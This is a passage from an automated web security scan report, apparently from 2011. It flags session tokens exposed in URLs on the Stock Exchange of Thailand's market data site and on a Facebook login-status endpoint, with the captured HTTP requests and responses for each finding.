Cookie: verify=test; JSESSIONID=C79B035F62797B23B65F20B1E721575B; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=213194248.998969890.1304449190.1304449190.1304449190.1; __utmb=213194248; __utmc=213194248; __utmz=213194248.1304449190.1.1.utmccn=(referral)|utmcsr=set.or.th|utmcct=/en/sitemap/for_listing.html|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:07:08 GMT
Server: Apache-Coyote/1.1
ETag: W/"78-1303176638000"
Last-Modified: Tue, 19 Apr 2011 01:30:38 GMT
Content-Type: image/gif
Content-Length: 78

GIF89a...............................!.......,............:.-0.@+.8....F(.d..;

12.22. http://marketdata.set.or.th/mkt/images/tab-grey-left.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://marketdata.set.or.th
Path:   /mkt/images/tab-grey-left.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /mkt/images/tab-grey-left.gif;jsessionid=C79B035F62797B23B65F20B1E721575B HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://marketdata.set.or.th/mkt/topten.do?language=en&country=US
Cookie: JSESSIONID=C79B035F62797B23B65F20B1E721575B; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=96

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:07:00 GMT
Server: Apache-Coyote/1.1
ETag: W/"145-1303176634000"
Last-Modified: Tue, 19 Apr 2011 01:30:34 GMT
Content-Type: image/gif
Content-Length: 145

GIF89a.......................................................!.......,..........>.I'L...".(.A.`.hI.8A....:
b...+K..../.$*.H$-.<2.OEc:.Q...UK.6".;

12.23. http://marketdata.set.or.th/mkt/images/tab-grey-right.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://marketdata.set.or.th
Path:   /mkt/images/tab-grey-right.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /mkt/images/tab-grey-right.gif;jsessionid=C79B035F62797B23B65F20B1E721575B HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://marketdata.set.or.th/mkt/topten.do?language=en&country=US
Cookie: JSESSIONID=C79B035F62797B23B65F20B1E721575B; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=96

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:06:53 GMT
Server: Apache-Coyote/1.1
ETag: W/"138-1303176646000"
Last-Modified: Tue, 19 Apr 2011 01:30:46 GMT
Content-Type: image/gif
Content-Length: 138

GIF89a.......................................................!.......,..........7P...    ..C.> 1%d..    !.......K]+../x.0@./......R.X2...S..D..;

12.24. http://marketdata.set.or.th/mkt/javascripts/javascript.js  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://marketdata.set.or.th
Path:   /mkt/javascripts/javascript.js

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /mkt/javascripts/javascript.js;jsessionid=C79B035F62797B23B65F20B1E721575B HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://marketdata.set.or.th/mkt/topten.do?language=en&country=US
Cookie: JSESSIONID=C79B035F62797B23B65F20B1E721575B; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=96

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:59:46 GMT
Server: Apache-Coyote/1.1
ETag: W/"333-1303176638000"
Last-Modified: Tue, 19 Apr 2011 01:30:38 GMT
Content-Type: text/javascript
Content-Length: 333

function doClear(theText) {
if (theText.value == theText.defaultValue){
theText.value = "";
}
}
function alertWindow(url){
   aWindow = window.open(url,'symbolWindow', 'scrollba
...[SNIP]...

12.25. http://marketdata.set.or.th/mkt/styles/setstyle.css  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://marketdata.set.or.th
Path:   /mkt/styles/setstyle.css

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /mkt/styles/setstyle.css;jsessionid=4EDB36875A31B80E0EEACBCF6DA0DF59 HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://marketdata.set.or.th/static/market/set/indextab_en_US.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:48:30 GMT
Server: Apache-Coyote/1.1
ETag: W/"13044-1303176648000"
Last-Modified: Tue, 19 Apr 2011 01:30:48 GMT
Content-Type: text/css
Content-Length: 13044

table {FONT: 10pt Tahoma, MS Sans Serif, Microsoft Sans Serif, Verdana, AngsanaUPC, CordiaUPC; COLOR: #000000; TEXT-DECORATION: none}
body {FONT: 10pt Tahoma, MS Sans Serif, Microsoft Sans Serif, Ver
...[SNIP]...

12.26. http://marketdata.set.or.th/mkt/topten.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://marketdata.set.or.th
Path:   /mkt/topten.do

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /mkt/topten.do?language=en&country=US HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/sitemap/for_listing.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:59:43 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=tis-620
Content-Language: en-US
Set-Cookie: JSESSIONID=23A1B718BE31C3B5E88C96682836394A; Path=/mkt
Content-Length: 57003


<html>
<head>
<link href="/mkt/styles/setstyle.css;jsessionid=23A1B718BE31C3B5E88C96682836394A" rel="stylesheet" type="text/css">
<link href="/menuFile/framework.css" rel="stylesheet" type="text/css">
...[SNIP]...
rket, equity, bond, derivatives, stock market, quotes, financial, internet trading, listed companies, IPO, rules & regulations, broker, market data, investment information, news, investor education">
<script language=javascript src="/mkt/javascripts/javascript.js;jsessionid=23A1B718BE31C3B5E88C96682836394A"></script>
...[SNIP]...
<td><img height="10" width="50" src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A"></td>
...[SNIP]...
<td><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="9" height="1"></td>
<td><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="175" height="1"></td>
<td><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="6" height="1"></td>
...[SNIP]...
<td colspan="3"><img src="/mkt/images/leftbox-top.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="190" height="9"></td>
...[SNIP]...
<td><img height="10" width="50" src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A"></td>
...[SNIP]...
<td><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
<td><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A"height="1" width="613"></td>
<td><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td><img src="/mkt/images/middlebox-topleft.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="10" height="31"></td>
...[SNIP]...
<td width="100%" background="/mkt/images/middlebox-bgtop.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td><img src="/mkt/images/middlebox-topright.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="10" height="31"></td>
...[SNIP]...
<div class="webonly"><img height="1" width="1" src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A"></div>
...[SNIP]...
<td height="30"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="10" height="1"></td>
...[SNIP]...
<td><img src="/mkt/images/button-orange.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="23" height="23"></td>
...[SNIP]...
<td width="100%"><img height="1" width="1" src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A">
<div class="webonly">
...[SNIP]...
<a href="javascript:printWindow()" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image125','','/mkt/images/icon-print-en02.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A',1)"><img src="/mkt/images/icon-print-en01.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" name="Image125" width="59" height="22" border="0"></a>
...[SNIP]...
p%3A%2F%2Fmarketdata.set.or.th%2Fmkt%2Ftopten.do" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image124','','/mkt/images/icon-thai02.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A',1)"><img src="/mkt/images/icon-thai01.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" name="Image124" width="57" height="22" border="0"></a>
...[SNIP]...
<td><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="10" height="1"></td>
...[SNIP]...
<td width="80"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="80" height="10"></td>
<td width="65"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="65" height="1"></td>
<td width="60"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="60" height="1"></td>
<td width="60"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="60" height="1"></td>
<td width="60"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="60" height="1"></td>
<td width="60"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="60" height="1"></td>
<td width="85"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="85" height="1"></td>
<td width="85"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="85" height="1"></td>
...[SNIP]...
<td colspan="8"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="3"></td>
...[SNIP]...
<td colspan="8"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="8" class="yellowline"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="3"></td>
...[SNIP]...
<td colspan="8" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="8" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="8" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="8" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="8" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="10"></td>
<td><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
<td><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
<td><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
<td><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
<td><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
<td><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
<td><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td nowrap><img src="/mkt/images/tab-blue-left.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="7" height="22"></td>
...[SNIP]...
<td><img src="/mkt/images/tab-blue-right.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="6" height="22"></td>
...[SNIP]...
<td><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="10" height="22"></td>
...[SNIP]...
<td nowrap><img src="/mkt/images/tab-grey-left.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="7" height="22"></td>
...[SNIP]...
<td nowrap background="/mkt/images/tab-grey-bg.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="100" align="center">
<a href="/mkt/topten.do;jsessionid=23A1B718BE31C3B5E88C96682836394A?market=S&amp;language=en&amp;country=US" class="tab">mai</a>
...[SNIP]...
<td nowrap><img src="/mkt/images/tab-grey-right.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="6" height="22"></td>
...[SNIP]...
<td><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="350" height="22"></td>
...[SNIP]...
<td colspan="9"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="5"></td>
...[SNIP]...
<td colspan="4"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="3"></td>
...[SNIP]...
<td colspan="4"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="yellowline"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="3"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="3"></td>
...[SNIP]...
<td colspan="4"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="yellowline"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="3"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="3"></td>
...[SNIP]...
<td colspan="4"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="yellowline"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="3"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="3"></td>
...[SNIP]...
<td colspan="4"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="yellowline"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="3"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" class="line"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td bgcolor="#c2c2c2"><img height="1" width="1" src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A"></td>
...[SNIP]...
<td><img src="/mkt/images/middlebox-bottomleft.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="10" height="14"></td>
...[SNIP]...
<td width="100%" background="/mkt/images/middlebox-bottom-bg.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A"><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="1"></td>
...[SNIP]...
<td><img src="/mkt/images/middlebox-bottomright.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="10" height="14"></td>
...[SNIP]...
<td><img height="10" width="50" src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A"></td>
...[SNIP]...
<td><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="3" height="1"></td>
<td><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="179" height="1"></td>
<td><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="13" height="1"></td>
...[SNIP]...
<td colspan="3"><img src="/mkt/images/rightbox-top.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="195" height="10"></td>
...[SNIP]...
<td><img height="20" src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A"></td>
...[SNIP]...
<div align="center">


   <img src="/mkt/images/rss.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" border="0"><a class="greylink" href="http://www.set.or.th/en/rss/rss_p1.html" target="_parent">
...[SNIP]...
<td class="copyright" align="center" nowrap>For more information, please contact S-E-T Call Center Tel. 0-2229-2222 E-mail :
<img src="/mkt/images/email-setcallcenter.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="120" height="15"></td>
...[SNIP]...
<td><img src="/mkt/images/spacer.gif;jsessionid=23A1B718BE31C3B5E88C96682836394A" width="1" height="5"></td>
...[SNIP]...

12.27. http://marketdata.set.or.th/static/market/set/indextab_en_US.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://marketdata.set.or.th
Path:   /static/market/set/indextab_en_US.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /static/market/set/indextab_en_US.html HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/integrated-set.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:48:29 GMT
Server: Apache
Last-Modified: Tue, 03 May 2011 13:48:00 GMT
ETag: "4602d1-4324-63650400"
Accept-Ranges: bytes
Content-Length: 17188
Content-Type: text/html


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title></title>
<link href="/mkt/styles/setstyle.css;jsessionid=D4EEC7E5656A8ACAE9CAF75E4DCB5B33" rel="stylesheet" type="text/css">
</head>
...[SNIP]...

12.28. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_04_0_906814&sId=0
